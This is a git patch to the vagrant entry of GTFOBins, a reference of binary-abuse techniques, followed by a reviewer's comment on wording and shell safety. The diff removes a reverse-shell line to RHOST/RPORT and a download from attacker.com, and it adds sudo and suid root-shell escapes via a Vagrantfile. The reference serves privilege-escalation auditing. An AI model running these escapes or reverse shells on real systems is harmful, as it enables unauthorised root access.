From f121dff1cc50157a70e5a6bb1d0c2d75a09c1594 Mon Sep 17 00:00:00 2001
From: Andrea Cardaci
Date: Thu, 13 Apr 2023 08:34:09 +0200
Subject: [PATCH] Simplify vagrant
---
_gtfobins/vagrant.md | 38 ++++++++++++++------------------------
1 file changed, 14 insertions(+), 24 deletions(-)
diff --git a/_gtfobins/vagrant.md b/_gtfobins/vagrant.md
index 95de912..c297c81 100644
--- a/_gtfobins/vagrant.md
+++ b/_gtfobins/vagrant.md
@@ -1,30 +1,20 @@ --- -description: | -Vagrant can execute arbitrary ruby code when starting up. The Commands down below create a new directory "pwn" in the tmp-folder where vagrant then is initialized. After that the command is pasted into the Vagrantfile and executed. -More Info at https://gtfobins.github.io/gtfobins/ruby/ +description: This allows to execute [`ruby`](/gtfobins/ruby/) code, other functions may apply. functions: shell: - - code: mkdir /tmp/pwn && cd /tmp/pwn && vagrant init && echo 'exec "/bin/sh"' > Vagrantfile && vagrant up - - + - code: | + cd $(mktemp -d) + echo 'exec "/bin/sh"' > Vagrantfile + vagrant up sudo: - - code: mkdir /tmp/pwn && cd /tmp/pwn && vagrant init && echo 'exec "/bin/sh"' > Vagrantfile && sudo vagrant up - reverse-shell: - - description: | - Run `nc -lvnp RPORT` on the attacker box. - Replace RHOST and RPORT with the attacker ip and port to gain a reverse shell. - code: | - mkdir /tmp/pwn && cd /tmp/pwn && vagrant init && echo 'exec "sh -i &>/dev/tcp/RHOST/RPORT <&1"' > Vagrantfile && vagrant up - file-write: - - code: mkdir /tmp/pwn && cd /tmp/pwn && vagrant init && echo 'File.open("file_to_write", "w+") { |f| f.write("DATA") }' > Vagrantfile && vagrant up - file-read: - - code: mkdir /tmp/pwn && cd /tmp/pwn && vagrant init && echo 'puts File.read("file_to_read")' > Vagrantfile && vagrant up - library-load: - - code: ruby -e 'require "fiddle"; Fiddle.dlopen("lib.so")' - file-download: - - description: Fetch a remote file via HTTP GET request. - code: | - export URL=http://attacker.com/file_to_get - export LFILE=file_to_save - mkdir /tmp/pwn && cd /tmp/pwn && vagrant init && echo 'require "open-uri"; download = open(ENV["URL"]); IO.copy_stream(download, ENV["LFILE"])' > Vagrantfile && vagrant up + - code: | + cd $(mktemp -d) + echo 'exec "/bin/sh"' > Vagrantfile + vagrant up + suid: + - code: | + cd $(mktemp -d) + echo 'exec "/bin/sh -p"' > Vagrantfile + vagrant up ---
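Review bot: The new `description` no longer states why this entry exists: the removed text said Vagrant executes Ruby code when starting up, and the `code` blocks rely on `vagrant up` reading the `Vagrantfile` in the current directory. Someone auditing sudoers rules needs that fact, because a rule permitting `vagrant` is effectively a rule permitting arbitrary Ruby. I would keep one sentence such as `Vagrant evaluates the Vagrantfile in the working directory as Ruby code on startup.` ahead of the link, and reword `This allows to execute` to `This can be used to execute`. Separately, the three `code` blocks lost the `&&` chaining of the removed lines. If `mktemp -d` fails, the unquoted `cd $(mktemp -d)` becomes a bare `cd` and the following `echo` overwrites any `Vagrantfile` in the home directory, so `cd "$(mktemp -d)" && echo ... > Vagrantfile && vagrant up` would fail closed.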